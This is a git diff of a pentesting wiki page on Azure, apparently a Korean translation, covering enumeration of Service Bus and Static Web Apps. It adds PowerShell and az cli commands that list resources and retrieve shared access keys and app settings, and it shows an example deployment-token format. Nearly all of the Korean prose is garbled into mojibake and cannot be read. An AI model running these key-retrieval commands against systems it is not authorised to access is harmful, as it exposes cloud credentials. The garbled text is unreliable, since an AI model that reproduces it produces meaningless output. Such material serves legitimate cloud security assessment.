+Get-AzServiceBusNamespaceV2 -ResourceGroupName -Name
+
+# Retrieves the authorization rules for a Service Bus namespace, queue, or topic.
+Get-AzServiceBusAuthorizationRule -ResourceGroupName -NamespaceName
+
+# Retrieves the Geo-Disaster Recovery configuration for a Service Bus namespace, if it is enabled.
+Get-AzServiceBusGeoDRConfiguration -ResourceGroupName -NamespaceName
+
+# Retrieves the shared access keys for a specified authorization rule in a Service Bus namespace.
+Get-AzServiceBusKey -ResourceGroupName -NamespaceName -Name
+
+# Retrieves the migration state and details for a Service Bus namespace, if a migration is in progress.
+Get-AzServiceBusMigration -ResourceGroupName -NamespaceName
+
+# Retrieves properties and details about a Service Bus namespace.
+Get-AzServiceBusNamespace -ResourceGroupName -Name
+
+# Retrieves the network rule set for a Service Bus namespace, such as IP restrictions or virtual network access rules.
+Get-AzServiceBusNetworkRuleSet -ResourceGroupName -NamespaceName
+
+# Retrieves private endpoint connections for a Service Bus namespace.
+Get-AzServiceBusPrivateEndpointConnection -ResourceGroupName -NamespaceName
+
+# Retrieves private link resources associated with a Service Bus namespace.
+Get-AzServiceBusPrivateLink -ResourceGroupName -NamespaceName
+
+# Retrieves details of a specified queue in a Service Bus namespace.
+Get-AzServiceBusQueue -ResourceGroupName -NamespaceName -Name
+
+# Retrieves rules (filters and actions) for a subscription under a Service Bus topic.
+Get-AzServiceBusRule -ResourceGroupName -NamespaceName -TopicName -SubscriptionName
+
+# Retrieves details of subscriptions for a specified Service Bus topic.
+Get-AzServiceBusSubscription -ResourceGroupName -NamespaceName -TopicName
+
+# Retrieves details of a specified topic in a Service Bus namespace.
+Get-AzServiceBusTopic -ResourceGroupName -NamespaceName
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+
### ๊ถํ ์์น
{{#ref}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
index 270d7a0ad..e7cc4bbd7 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
@@ -4,16 +4,16 @@
## Static Web Apps Basic Information
-Azure Static Web Apps๋ **GitHub์ ๊ฐ์ ๋ฆฌํฌ์งํ ๋ฆฌ์์ ์๋ CI/CD๋ฅผ ํตํด ์ ์ ์น ์ฑ์ ํธ์คํ
ํ๋ ํด๋ผ์ฐ๋ ์๋น์ค**์
๋๋ค. ๊ธ๋ก๋ฒ ์ฝํ
์ธ ์ ์ก, ์๋ฒ๋ฆฌ์ค ๋ฐฑ์๋ ๋ฐ ๋ด์ฅ HTTPS๋ฅผ ์ ๊ณตํ์ฌ ์์ ํ๊ณ ํ์ฅ ๊ฐ๋ฅํฉ๋๋ค. ๊ทธ๋ฌ๋ ์๋น์ค๊ฐ "์ ์ "์ด๋ผ๊ณ ํด์ ์์ ํ ์์ ํ๋ค๋ ์๋ฏธ๋ ์๋๋๋ค. ์ํ ์์๋ก๋ ์๋ชป ๊ตฌ์ฑ๋ CORS, ๋ถ์ถฉ๋ถํ ์ธ์ฆ ๋ฐ ์ฝํ
์ธ ๋ณ์กฐ๊ฐ ์์ผ๋ฉฐ, ์ ์ ํ ๊ด๋ฆฌ๋์ง ์์ผ๋ฉด XSS ๋ฐ ๋ฐ์ดํฐ ์ ์ถ๊ณผ ๊ฐ์ ๊ณต๊ฒฉ์ ๋
ธ์ถ๋ ์ ์์ต๋๋ค.
+Azure Static Web Apps๋ **GitHub์ ๊ฐ์ ๋ฆฌํฌ์งํ ๋ฆฌ์์ ์๋ CI/CD๋ฅผ ํตํด ์ ์ ์น ์ฑ์ ํธ์คํ
ํ๋ ํด๋ผ์ฐ๋ ์๋น์ค**์
๋๋ค. ์ ์ธ๊ณ ์ฝํ
์ธ ๋ฐฐํฌ, ์๋ฒ๋ฆฌ์ค ๋ฐฑ์๋ ๋ฐ ๋ด์ฅ HTTPS๋ฅผ ์ ๊ณตํ์ฌ ์์ ํ๊ณ ํ์ฅ ๊ฐ๋ฅํฉ๋๋ค. ๊ทธ๋ฌ๋ ์๋น์ค๊ฐ "์ ์ "์ด๋ผ๊ณ ํด์ ์์ ํ ์์ ํ๋ค๋ ์๋ฏธ๋ ์๋๋๋ค. ์ํ ์์๋ก๋ ์๋ชป ๊ตฌ์ฑ๋ CORS, ๋ถ์ถฉ๋ถํ ์ธ์ฆ ๋ฐ ์ฝํ
์ธ ๋ณ์กฐ๊ฐ ์์ผ๋ฉฐ, ์ ์ ํ ๊ด๋ฆฌ๋์ง ์์ผ๋ฉด XSS ๋ฐ ๋ฐ์ดํฐ ์ ์ถ๊ณผ ๊ฐ์ ๊ณต๊ฒฉ์ ๋
ธ์ถ๋ ์ ์์ต๋๋ค.
### Deployment Authentication
> [!TIP]
> Static App์ด ์์ฑ๋ ๋ **๋ฐฐํฌ ์ธ์ฆ ์ ์ฑ
**์ผ๋ก **๋ฐฐํฌ ํ ํฐ**๊ณผ **GitHub Actions ์ํฌํ๋ก์ฐ** ์ค์์ ์ ํํ ์ ์์ต๋๋ค.
-- **๋ฐฐํฌ ํ ํฐ**: ํ ํฐ์ด ์์ฑ๋์ด ๋ฐฐํฌ ํ๋ก์ธ์ค๋ฅผ ์ธ์ฆํ๋ ๋ฐ ์ฌ์ฉ๋ฉ๋๋ค. **์ด ํ ํฐ๋ง ์์ผ๋ฉด ์ฑ์ ์ ๋ฒ์ ์ ๋ฐฐํฌํ ์ ์์ต๋๋ค**. ๋ฆฌํฌ์งํ ๋ฆฌ๊ฐ ์
๋ฐ์ดํธ๋ ๋๋ง๋ค ์ฑ์ ์ ๋ฒ์ ์ ๋ฐฐํฌํ๊ธฐ ์ํด ๋น๋ฐ์ ํ ํฐ์ด ํฌํจ๋ **Github Action์ด ์๋์ผ๋ก ๋ฆฌํฌ์ ๋ฐฐํฌ๋ฉ๋๋ค**.
-- **GitHub Actions ์ํฌํ๋ก์ฐ**: ์ด ๊ฒฝ์ฐ ๋งค์ฐ ์ ์ฌํ Github Action์ด ๋ฆฌํฌ์ ๋ฐฐํฌ๋๋ฉฐ **ํ ํฐ๋ ๋น๋ฐ์ ์ ์ฅ๋ฉ๋๋ค**. ๊ทธ๋ฌ๋ ์ด Github Action์ **`actions/github-script@v6`** ์ก์
์ ์ฌ์ฉํ์ฌ ๋ฆฌํฌ์งํ ๋ฆฌ์ IDToken์ ๊ฐ์ ธ์ค๊ณ ์ด๋ฅผ ์ฌ์ฉํ์ฌ ์ฑ์ ๋ฐฐํฌํ๋ ์ฐจ์ด์ ์ด ์์ต๋๋ค.
-- ๋ ๊ฒฝ์ฐ ๋ชจ๋ **`Azure/static-web-apps-deploy@v1`** ์ก์
์ด `azure_static_web_apps_api_token` ๋งค๊ฐ๋ณ์์ ์๋ ํ ํฐ๊ณผ ํจ๊ป ์ฌ์ฉ๋์ง๋ง, ๋ ๋ฒ์งธ ๊ฒฝ์ฐ์๋ `github_id_token` ๋งค๊ฐ๋ณ์์ IDToken์ผ๋ก ์ธ์ฆ์ด ์ด๋ฃจ์ด์ง๋ฏ๋ก `12345cbb198a77a092ff885781a62a15d51ef5e3654ca11234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345`์ ๊ฐ์ ์ ํจํ ํ์์ ์์ ํ ํฐ๋ง์ผ๋ก๋ ์ฑ์ ๋ฐฐํฌํ ์ ์์ต๋๋ค.
+- **๋ฐฐํฌ ํ ํฐ**: ํ ํฐ์ด ์์ฑ๋์ด ๋ฐฐํฌ ํ๋ก์ธ์ค๋ฅผ ์ธ์ฆํ๋ ๋ฐ ์ฌ์ฉ๋ฉ๋๋ค. **์ด ํ ํฐ๋ง ์์ผ๋ฉด ์ฑ์ ์ ๋ฒ์ ์ ๋ฐฐํฌํ ์ ์์ต๋๋ค**. ๋ฆฌํฌ์งํ ๋ฆฌ๊ฐ ์
๋ฐ์ดํธ๋ ๋๋ง๋ค ์ฑ์ ์ ๋ฒ์ ์ ๋ฐฐํฌํ๊ธฐ ์ํด ๋น๋ฐ์ ํ ํฐ์ด ํฌํจ๋ **Github Action์ด ์๋์ผ๋ก ๋ฆฌํฌ์งํ ๋ฆฌ์ ๋ฐฐํฌ๋ฉ๋๋ค**.
+- **GitHub Actions ์ํฌํ๋ก์ฐ**: ์ด ๊ฒฝ์ฐ ๋งค์ฐ ์ ์ฌํ Github Action์ด ๋ฆฌํฌ์งํ ๋ฆฌ์ ๋ฐฐํฌ๋๋ฉฐ **ํ ํฐ๋ ๋น๋ฐ์ ์ ์ฅ๋ฉ๋๋ค**. ๊ทธ๋ฌ๋ ์ด Github Action์ ์ฐจ์ด๊ฐ ์์ผ๋ฉฐ, **`actions/github-script@v6`** ์ก์
์ ์ฌ์ฉํ์ฌ ๋ฆฌํฌ์งํ ๋ฆฌ์ IDToken์ ๊ฐ์ ธ์ค๊ณ ์ด๋ฅผ ์ฌ์ฉํ์ฌ ์ฑ์ ๋ฐฐํฌํฉ๋๋ค.
+- ๋ ๊ฒฝ์ฐ ๋ชจ๋ **`Azure/static-web-apps-deploy@v1`** ์ก์
์ด `azure_static_web_apps_api_token` ๋งค๊ฐ๋ณ์์ ์๋ ํ ํฐ๊ณผ ํจ๊ป ์ฌ์ฉ๋์ง๋ง, ๋ ๋ฒ์งธ ๊ฒฝ์ฐ์๋ `github_id_token` ๋งค๊ฐ๋ณ์์ IDToken์ผ๋ก ์ธ์ฆ์ด ์ด๋ฃจ์ด์ง๋ฏ๋ก `12345cbb198a77a092ff885781a62a15d51ef5e3654ca11234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345`์ ๊ฐ์ ์ ํจํ ํ์์ ์์์ ํ ํฐ๋ง์ผ๋ก๋ ์ฑ์ ๋ฐฐํฌํ ์ ์์ต๋๋ค.
### Web App Basic Authentication
@@ -62,20 +62,24 @@ az rest --method GET \
}
}
```
-๊ฒฝ๋ก๋ฅผ **์ญํ ๋ก ๋ณดํธ**ํ ์ ์๋ ๋ฐฉ๋ฒ์ ์ ์ํ์ธ์. ๊ทธ๋ฌ๋ฉด ์ฌ์ฉ์๋ ์ฑ์ ์ธ์ฆํ๊ณ ํด๋น ์ญํ ์ ๋ถ์ฌ๋ฐ์์ผ ๊ฒฝ๋ก์ ์ ๊ทผํ ์ ์์ต๋๋ค. ๋ํ, **์ด๋์ฅ์ ์์ฑ**ํ์ฌ EntraID, Facebook, GitHub, Google, Twitter๋ฅผ ํตํด ๋ก๊ทธ์ธํ๋ ํน์ ์ฌ์ฉ์์๊ฒ ํน์ ์ญํ ์ ๋ถ์ฌํ ์ ์์ผ๋ฉฐ, ์ด๋ ์ฑ ๋ด์์ ๊ถํ์ ์์น์ํค๋ ๋ฐ ์ ์ฉํ ์ ์์ต๋๋ค.
+๋
ธํธ: **์ญํ ๋ก ๊ฒฝ๋ก๋ฅผ ๋ณดํธํ๋ ๊ฒ์ด ๊ฐ๋ฅ**ํ๋ค๋ ์ ์ ์ ์ํ์ธ์. ๊ทธ๋ฌ๋ฉด ์ฌ์ฉ์๋ ์ฑ์ ์ธ์ฆํ๊ณ ํด๋น ์ญํ ์ ๋ถ์ฌ๋ฐ์์ผ ๊ฒฝ๋ก์ ์ ๊ทผํ ์ ์์ต๋๋ค. ๋ํ, **์ด๋์ฅ์ ์์ฑํ์ฌ ํน์ ์ฌ์ฉ์์๊ฒ ํน์ ์ญํ ์ ๋ถ์ฌ**ํ๋ ๊ฒ๋ ๊ฐ๋ฅํ๋ฉฐ, ์ด๋ EntraID, Facebook, GitHub, Google, Twitter๋ฅผ ํตํด ๋ก๊ทธ์ธํ๋ ์ฌ์ฉ์์๊ฒ ์ ์ฉํ ์ ์์ต๋๋ค. ์ด๋ฅผ ํตํด ์ฑ ๋ด์์ ๊ถํ์ ์์น์ํฌ ์ ์์ต๋๋ค.
> [!TIP]
-> `staticwebapp.config.json` ํ์ผ์ ๋ํ **๋ณ๊ฒฝ ์ฌํญ์ด ์์ฉ๋์ง ์๋๋ก ์ฑ์ ๊ตฌ์ฑํ ์ ์์ต๋๋ค**. ์ด ๊ฒฝ์ฐ, ๋จ์ํ Github์์ ํ์ผ์ ๋ณ๊ฒฝํ๋ ๊ฒ๋ง์ผ๋ก๋ ์ถฉ๋ถํ์ง ์์ ์ ์์ผ๋ฉฐ, **์ฑ์ ์ค์ ์ ๋ณ๊ฒฝํด์ผ ํ ์๋ ์์ต๋๋ค**.
+> ์ฑ์ ๊ตฌ์ฑํ์ฌ **`staticwebapp.config.json`** ํ์ผ์ ๋ํ ๋ณ๊ฒฝ ์ฌํญ์ด ์์ฉ๋์ง ์๋๋ก ์ค์ ํ ์ ์๋ค๋ ์ ์ ์ ์ํ์ธ์. ์ด ๊ฒฝ์ฐ, ๋จ์ํ Github์์ ํ์ผ์ ๋ณ๊ฒฝํ๋ ๊ฒ๋ง์ผ๋ก๋ ์ถฉ๋ถํ์ง ์์ ์ ์์ผ๋ฉฐ, **์ฑ์ ์ค์ ์ ๋ณ๊ฒฝํด์ผ ํ ์๋ ์์ต๋๋ค**.
์คํ
์ด์ง URL์ ๋ค์ ํ์์ ๊ฐ์ง๋๋ค: `https://-..` ์: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net`
### ๊ด๋ฆฌํ ID
-Azure Static Web Apps๋ **๊ด๋ฆฌํ ID**๋ฅผ ์ฌ์ฉํ๋๋ก ๊ตฌ์ฑํ ์ ์์ง๋ง, [์ด FAQ](https://learn.microsoft.com/en-gb/azure/static-web-apps/faq#does-static-web-apps-support-managed-identity-)์์ ์ธ๊ธํ๋ฏ์ด ์ธ์ฆ ๋ชฉ์ ์ผ๋ก Azure Key Vault์์ ๋น๋ฐ์ **์ถ์ถํ๋ ๊ฒ๋ง ์ง์๋๋ฉฐ, ๋ค๋ฅธ Azure ๋ฆฌ์์ค์ ์ ๊ทผํ๋ ๊ฒ์ ์ง์๋์ง ์์ต๋๋ค**.
+Azure Static Web Apps๋ **๊ด๋ฆฌํ ID**๋ฅผ ์ฌ์ฉํ๋๋ก ๊ตฌ์ฑํ ์ ์์ง๋ง, [์ด FAQ](https://learn.microsoft.com/en-gb/azure/static-web-apps/faq#does-static-web-apps-support-managed-identity-)์์ ์ธ๊ธํ๋ฏ์ด, ์ธ์ฆ ๋ชฉ์ ์ผ๋ก Azure Key Vault์์ ๋น๋ฐ์ **์ถ์ถํ๋ ๊ฒ๋ง ์ง์**๋๋ฉฐ, ๋ค๋ฅธ Azure ๋ฆฌ์์ค์ ์ ๊ทผํ๋ ๊ฒ์ ์ง์๋์ง ์์ต๋๋ค.
์์ธํ ๋ด์ฉ์ https://learn.microsoft.com/en-us/azure/static-web-apps/key-vault-secrets์์ Azure ๊ฐ์ด๋๋ฅผ ์ฐธ์กฐํ์ฌ ์ ์ ์ฑ์์ ๊ธ๊ณ ๋น๋ฐ์ ์ฌ์ฉํ๋ ๋ฐฉ๋ฒ์ ํ์ธํ ์ ์์ต๋๋ค.
## ์ด๊ฑฐ
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
```bash
# List Static Webapps
az staticwebapp list --output table
@@ -107,13 +111,66 @@ az rest --method POST \
# Check connected backends
az staticwebapp backends show --name --resource-group
```
-## ์น ์ฑ ์์ฑ ์์
+{% endcode %}
+{% endtab %}
-๋ค์ ๋งํฌ์์ ์น ์ฑ์ ์์ฑํ๋ ์ข์ ์์ ๋ฅผ ์ฐพ์ ์ ์์ต๋๋ค: [https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github](https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github)
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+Get-Command -Module Az.Websites
+
+# Retrieves details of a specific Static Web App in the specified resource group.
+Get-AzStaticWebApp -ResourceGroupName -Name
+
+# Retrieves the build details for a specific Static Web App.
+Get-AzStaticWebAppBuild -ResourceGroupName -Name
+
+# Retrieves the application settings for a specific build environment in a Static Web App.
+Get-AzStaticWebAppBuildAppSetting -ResourceGroupName -Name -EnvironmentName
+
+# Retrieves functions for a specific build environment in a Static Web App.
+Get-AzStaticWebAppBuildFunction -ResourceGroupName -Name -EnvironmentName
+
+# Retrieves function app settings for a specific build environment in a Static Web App.
+Get-AzStaticWebAppBuildFunctionAppSetting -ResourceGroupName